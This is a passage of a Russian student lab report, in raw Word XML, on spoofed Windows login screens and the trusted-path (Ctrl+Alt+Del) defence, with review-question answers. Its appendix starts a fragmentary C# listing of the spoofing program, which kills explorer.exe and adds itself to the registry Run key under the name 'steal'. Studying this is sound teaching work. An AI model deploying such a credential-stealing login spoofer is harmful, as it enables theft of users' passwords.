            <wp:extent cx="6299835" cy="4493260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5CA3" w14:textId="1A9B5D44" w:rsidR="00F51D0E" w:rsidRDefault="00F51D0E" w:rsidP="00F51D0E">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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F51D0E"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 w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F51D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F51D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Д</w:t>
      </w:r>
      <w:r w:rsidRPr="00F51D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>анные, украденные у пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0BCFE" w14:textId="4832D70F" w:rsidR="00F51D0E" w:rsidRDefault="00F51D0E" w:rsidP="00F51D0E">
      <w:r>
        <w:t xml:space="preserve">Во избежание подобных случаев со стороны злоумышленников, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00F51D0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">есть система, называемая «доверенным путем» (рис. </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008B7DD8">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Таким образом, при каждом входе в систему пользователь минует различные вредоносные программы, обращаясь непосредственно к системе (рис. </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="0072210F">
        <w:t xml:space="preserve"> На рисунке 8 представлена блок-схема получившейся программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3A7D71" w14:textId="77777777" w:rsidR="00F51D0E" w:rsidRDefault="00F51D0E" w:rsidP="00F51D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354B9B" wp14:editId="25075DE0">
            <wp:extent cx="2649487" cy="2925356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487" cy="2925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CA4C8" w14:textId="5C9F984C" w:rsidR="00F51D0E" w:rsidRDefault="00F51D0E" w:rsidP="00F51D0E">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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F51D0E"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 w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00F51D0E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>одключение доверенного пути</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E37074" w14:textId="77777777" w:rsidR="008B7DD8" w:rsidRDefault="008B7DD8" w:rsidP="008B7DD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263CB2" wp14:editId="0AF7433B">
            <wp:extent cx="4672843" cy="35091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43" cy="3509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E8595" w14:textId="1D940BBC" w:rsidR="00F51D0E" w:rsidRDefault="008B7DD8" w:rsidP="007A0C51">
      <w:pPr>
        <w:pStyle w:val="aff"/>
        <w:ind w:firstLine="0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8B7DD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="007A0C51">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="008B7DD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008B7DD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Вход в систему с подключенным доверенным путем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF3F06" w14:textId="342D876D" w:rsidR="0072210F" w:rsidRPr="0072210F" w:rsidRDefault="00960360" w:rsidP="00960360">
      <w:pPr>
        <w:keepNext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81FB76" wp14:editId="5E8BCC67">
            <wp:extent cx="4676775" cy="55149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DA18" w14:textId="2F8707A3" w:rsidR="0072210F" w:rsidRPr="00960360" w:rsidRDefault="0072210F" w:rsidP="00960360">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072210F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0072210F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3309C" w:rsidRPr="000123A7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0072210F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Блок-схема</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B265763" w14:textId="77777777" w:rsidR="008B7DD8" w:rsidRDefault="00C93DCC" w:rsidP="008B7DD8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Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EBB4B" w14:textId="3DF640F2" w:rsidR="008B7DD8" w:rsidRPr="008B7DD8" w:rsidRDefault="008B7DD8" w:rsidP="008B7DD8">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B7DD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>В данной лабораторной работе мы приобрели навыки по защите информационных систем путем проверки подлинности пользователей, а также исследовали проблему подмены механизмов аутентификации и научились с ней бороться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E17DAE" w14:textId="77777777" w:rsidR="008B7DD8" w:rsidRDefault="008B7DD8" w:rsidP="008B7DD8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7DFD355A" w14:textId="7948827B" w:rsidR="00AE1FDE" w:rsidRPr="007D53C6" w:rsidRDefault="008B7DD8" w:rsidP="007D53C6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Ответы на контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDEC2A4" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Что такое аутентификация? Чем она отличается от идентификации?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8865F" w14:textId="7B545D5D" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Аутентификация — проверка заявленного соответствия, то есть того, что пользователь является именно тем, за кого он себя выдает. Идентификация – присвоение субъектам и объектам системы уникальных идентификаторов. </w:t>
      </w:r>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Идентификация, в отличие от аутентификации, не осуществляет проверку, а просто присваивает идентификаторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1507EE8A" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Какие основные угрозы направлены на систему аутентификации в операционной системе Windows?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56D9B4" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>К основным угрозам относят:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEAC9B9" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="1418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Подмена подсистемы идентификации, аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C499771" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="1418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Подбор пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E43D711" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="1418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Компрометация файлов, содержащих пароли</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E7B51" w14:textId="2EA4CBDE" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Какие существуют основные методы противодействия угрозам системы аутентификации?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EDD1F5" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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изменение пароля, предлагаемого по умолчанию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C5D7A" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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регулярное изменение пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAD103" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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увеличение длины и сложности пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F122B4" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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использование утилит проверки и генерации пароля</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414D84A3" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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контроль доступа (запрет на запись в файл паролей)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E62E77" w14:textId="61163047" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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использование крипто вставки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A916F7B" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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использование хэш-функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C44B0E3" w14:textId="0EBDEEF5" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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взаимная аутентификация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242B102" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32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Опишите работу механизма доверенного пути в операционной системе Windows? В чем её отличия от реализации механизма доверенного пути в Unix-системах?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138D6A94" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Пример взаимной аутентификации системы и пользователя – это механизм «Доверенного пути» или, иными словами, нажатие комбинации </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ctrl+Alt+Del</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сообщение о нажатии этих клавиш передается только системному процессу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WinLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, а для остальных процессов, в частности для всех прикладных программ, их нажатие происходит незаметно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333E62DE" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В Unix-системах механизм «Доверенного пути» осуществляется с помощью SAK-процесса. Для допуска пользователей к доверенному пути и доверенной оболочке, устанавливается параметр </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> в соответствующей </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>станзе</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> файла </w:t>
      </w:r>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. При приглашении входа в систему, нажать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ctrl+X</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ctrl+R</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SAK-последовательность). Должно появиться новое приглашение входа в систему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63B3D7" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF72D1A" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Сколько вариантов необходимо перебрать, чтобы гарантированно определить пароль пользователя, состоящий из 6 цифр? Как изменится это число, если дополнительно использовать латинские буквы?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A0ACC" w14:textId="77777777" w:rsidR="007D53C6" w:rsidRPr="007D53C6" w:rsidRDefault="007D53C6" w:rsidP="007D53C6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы определить пароль, состоящий из 6 цифр, нужно перебрать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</w:rPr>
              <m:t>6</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
      </m:oMath>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> вариантов, так как всего возможно поставить одну из десяти цифр (от 0 до 9) на любое место в пароле. Если использовать прописные и заглавные латинские буквы, нужно будет перебрать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26+26+10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</w:rPr>
              <m:t>6</m:t>
            </m:r>
          </m:sup>
        </m:sSup>
      </m:oMath>
      <w:r w:rsidRPr="007D53C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> вариантов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4287BD" w14:textId="77777777" w:rsidR="00AE1FDE" w:rsidRDefault="00D740EB" w:rsidP="00D740EB">
      <w:pPr>
        <w:spacing w:line="24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3F5E2AD6" w14:textId="77777777" w:rsidR="00D740EB" w:rsidRDefault="00D740EB" w:rsidP="00D740EB">
      <w:pPr>
        <w:pStyle w:val="af8"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc35945238"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1A9E3108" w14:textId="0BCD394D" w:rsidR="00D740EB" w:rsidRPr="00A62693" w:rsidRDefault="00D740EB" w:rsidP="00D740EB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00A62693">
        <w:t>Листинг программы «</w:t>
      </w:r>
      <w:r w:rsidR="000E5FE7">
        <w:t>Аутентификация</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62693">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61361F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4265EB80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ComponentModel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B0855B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9CDC4A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FEB6E1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System.IO;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="67BA98A6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Win32;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7C7EFA02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Threading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E4A1989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C26B84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OIB11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3A37D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CC3A1B1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F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAuthorization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081ECE62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0E0393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see = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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50045AE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OnClosing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CancelEventArgs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67DF55D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3A9966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.OnClosing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81BA2C4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400255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A65B83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explorerBlock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1161E5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E55599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Thread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thr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Thread(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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ThreadStart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KillExplorer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C11AC64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thr.Priority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ThreadPriority.AboveNormal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0F620E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thr.IsBackground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3171E0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thr.Start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DEA8074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84ED96E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80B07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KillExplorer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CC02F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9B1F56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80E235F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6FDA64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processInfo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System.Diagnostics.Process.GetProcessesByName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"explorer"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19F0DD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processInfo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3A3383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CD71D1A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38459AC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770CC43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p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processInfo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5909B2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p.Kill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D5C5F4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3182F1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 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{ }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61D3F640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B9ACE1E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CE218B6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8DAC05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122C69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F66">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinAuthorization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3EB1AE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332BA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RegistryKey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steal = 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Registry.CurrentUser.OpenSubKey</w:t>
      </w:r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"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"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1EEF39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steal.SetValue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"steal"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Application.ExecutablePath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CC4F13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steal.Close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025EE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RegistryKey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Registry.CurrentUser.OpenSubKey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"Keys"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006777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==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8E1115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43205B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key 